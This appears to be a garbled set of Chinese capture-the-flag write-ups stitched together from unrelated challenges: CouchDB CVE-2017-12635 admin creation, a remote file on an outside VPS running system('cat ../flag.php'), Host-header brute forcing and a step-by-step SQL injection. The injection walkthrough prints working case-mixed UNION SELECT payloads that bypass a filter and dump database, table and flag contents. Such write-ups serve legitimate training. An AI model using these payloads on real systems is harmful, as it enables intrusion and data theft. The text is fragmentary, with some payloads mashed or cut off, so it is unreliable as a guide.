看起来像是brainfuck、jsfuck之类的,直接试试浏览器console执行,恰好alert弹出flag。
大概
已知md5前缀密码为4位数字字母组合
WinHex打开替换内容为FFFFFFFFF…WinHex-右键选中-Edit-FillBlock以doc格式打开
结合题目说FLAG是某二进制状态的MD5哈希值。可以猜到这些段落宽度和二进制有关。得出了二进制,并该二进制内容进行md5哈希,获得flag。
拿到题目后发现80端口无法访问,于是扫了一波端口发现5984开放搜了一下,发现是CouchDB漏洞然后发现2017的CVE:CVE-2017-12635可以创建一个管理员用户
所以我们的攻击点就很清楚了,首先在我们的vps上放一个文件,里面精心构造好一个json_encode这里我们选择system(‘cat../flag.php’)可以构造:12345
然后这里传入的变量b只有15个字符可控,然后我计算了一下:1skysec.top/11.c
刚刚好15个字符于是将我们之前构造的文件命名为11.c放在域名为skysec.top的vps上然后构造12$a="asdfghjklzc.top/11.ctyuioqwertskysecwertyuioqwertyuiop"66cb1c378941c2cc0f1d7979ca595461
不知道这个题出的意义何在……我们访问页面得到信息:ProxyError:192.168.5.46
一开始没有思路,后来抓包修改HOST发现回显都是相同的12ProxyError:192.168.5.1ProxyError:192.168.5.2
然后随便蛇皮爆破了一下:1Host:192.168.5.132
可以发现flag
题目描述
由于忘记了账号密码,黑客想通过一个非法的途径找回自己的账号密码。突然发现有个留言板,黑客
拍了拍脑袋想到,我有办法了!最后黑客通过留言板成功登陆后台修改了自己忘记的密码。(答案为flag{}形式,提交{}内内容即可)
解题步骤
Content-Security-Policy:script-src‘self’:img-src*;```
题目描述老王经常喜欢去邻居家聊天,奈何邻居家经常放一只哈士奇看门。哈士奇比萨摩耶聪明,能分辨正常的人型生物不让靠近。老王发现只要自己套个头套之类,哈士奇就认不出来了。聪明的小伙伴快想出老王绕过看门狗的方法,去看看老王到底在里面聊些啥。(答案以flag{}形式过得,将flag{}中内容提交即可)
步骤一:打开链接,看到一个新闻列表。
步骤二:点开某条标题,看到新闻详情。
步骤三:用and1=1测试,发现会对注入做拦截。
步骤四:通过And1=1测试,发现可以绕过注入拦截。
步骤五:通过UnionSelect1,2,3,4,5#测试,发现有5个字段。
步骤六:通过UnionSelect1,database(),user(),version(),5#获取数据库的敏感数据,当前数据库为news。
步骤七:通过UnionSelect1,(selEcttable_namefRoMinfOrmation_schema.tableswhEreTABLE_SCHEMA=‘news’limit1,1),3,4,5#获得有一张tb_flag表。
步骤八:通过UnionSelect1,(selecTcolumn_namefrOminfoRmation_schema.columnswheretable_name=‘tb_flag’anDtable_schema=‘news’limit0,1),3,4,5#获得tb_flag只有一个flag字段。
步骤九:通过ldid=2UnionSelect1,(selecT*frOmtb_flag/**/limit0,1),3,4,5#获得flag{1396265adbb760c86475304b98e3f61c}
题目描述:
国家能源总部经过派出卧底长期刺探,终于找到一个潜伏已久的国外内鬼:三楼能源楼管老王。由于抓捕仓促,老王服毒自尽了。侦查部门搜出老王每日看的报纸原来是特制的情报。聪明的你能从附件的报纸中找出情报么?flag是老王说的暗号。(由于老王的线人曾今做的土匪,所以用的行话)